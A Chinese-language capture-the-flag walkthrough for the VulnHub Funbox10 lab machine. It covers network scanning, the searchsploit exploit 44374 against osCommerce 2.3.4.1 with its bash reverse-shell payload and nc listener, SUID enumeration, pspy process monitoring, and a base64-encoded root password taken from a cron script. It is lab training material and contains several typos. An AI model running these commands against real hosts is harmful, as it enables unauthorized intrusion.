Funbox10靶机
靶机下载地址:Vulnerable By Design ~ VulnHub
靶机难度:中等。
打开靶机,让靶机和kali处于同一个网段。
一、信息收集
1.扫描IP
arp-scan -l
扫描内网端口
10.9.23.39端口出现的次数最多,打开确定一下,发现确定是10.9.23.39
nmap扫描同样扫到了
nmap -sS 10.9.23.39
2.查看开放的端口:
nmap -sV -p- 10.9.23.39
扫描出来发现开放了22、25、80、110、143端口
22:SSH 远程连接
25:SMTP (Simple Mail Transfer Protocol, 简单邮件传输协议 )服务器所开放,主要用于发送邮件。
80:网页端口
110:110端口,是为 POP3(邮件协议 3)服务开放的,主要用于接受邮件。(25端口和110端口是邮件常用端口)
143:IMAP协议,和POP3协议一样是用来接收邮件的,它是面向用户的,接收邮件以及很方便的操作服务器上的邮件。
3.敏感目录扫描
dirb hhtp://10.9.23.39/
4.网页信息收集
其他三个敏感目录进不去,全是404
只有catalog可以访问,那我们重点就看下这里,根据版本,我们找到了他有命令执行!
通过网页可知该网页所用的服务是邮件传输协议版本号v2.3.4.1
二、漏洞利用
1.搜索一些有没有版本漏洞
searchsploit osCommerce 2.3.4.1
找到了有三个可利用的漏洞程序,下载44374试一下
searchsploit -m 44374
2.下载漏洞
下载好了,打开查看一下
vim 44374.py
3.编译漏洞文件
根据提示,修改网页的目标地址和本地监听的地址
base url = "http://10.9.23.39/catalog/
target url = "http://10.9.23.3/catalog/install/install.php?step=4"
pavload += 'shell exec("bash -c \'bash -i >& /dev/tcp/10.9.23.40/7777 0>&1\'");'
4.启用漏洞文件
python 44374.py
5.开启端口反弹
nc -nvlp 7777
三、提权
1.切换到bashshell
python -c 'import pty;pty.spawn("/bin/bash")'
ls之后,用户下面并没有东西,sudo也不能提权。
2.使用pspy命令工具,监控Linux进程。
pspy是一个命令行工具,它可以在没有Root权限的情况下,监控Linux进程。黑客可以利用它来查看其他用户的计划任务工作(cron job)等。
3.使用find -perm有没有可以利用的sudo提权
使用命令:find / -perm -4000 -exec ls -al {} \; 2>/dev/null
发现没有可以利用的sudo
提权
四.下载pspy64s
1.github下载
下载地址
https://github.com/DominicBreuker/pspy
2.下载到kali,靶机从kali下载
下载好后把pspy64下到kali的home里面,然后开80端口让靶机从kali下载
python3 -m http.server 80
kali开网页端口:
靶机进网页端口下载:
3.为pspy赋权限
chmod 777 pspy64然后运行 pspy64
发现了一个 UID=1000 cron.sh
进行查看
chmod 777 pspy64
发现了一个 UID=1000 cron.sh 的,点进去进行查看
/usr/share/doc/examples/cron.sh
查看一下这个路径
cat /usr/share/doc/examples/cron.sh
发现了一个base64密码
LXUgcm9vdCAtcCByZnZiZ3QhIQ==
[base64解密网站](Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具 (jsons.cn))
密码:rfvbgt!!
4.su root登录
使用su - root的时候报错了,此时我们就需要进入/tmp目录下,把之前输的"import"简化命令给输出到asdf.py自定义python文件中,然后使用python运行,就可以su root了。
夺旗成功!!!-+
五、总结
一、扫描
扫描工具:namp、arp-scan
扫描端口:namp
扫描敏感目录:dirb
二、漏洞搜索
搜索漏洞:searchsploit
三、漏洞利用
对下载好的漏洞文件编译、安装
对文件赋权(chmod)然后利用
四、运行pspy64,发现了路径
五、解密base64。得到root密码。登录root成功。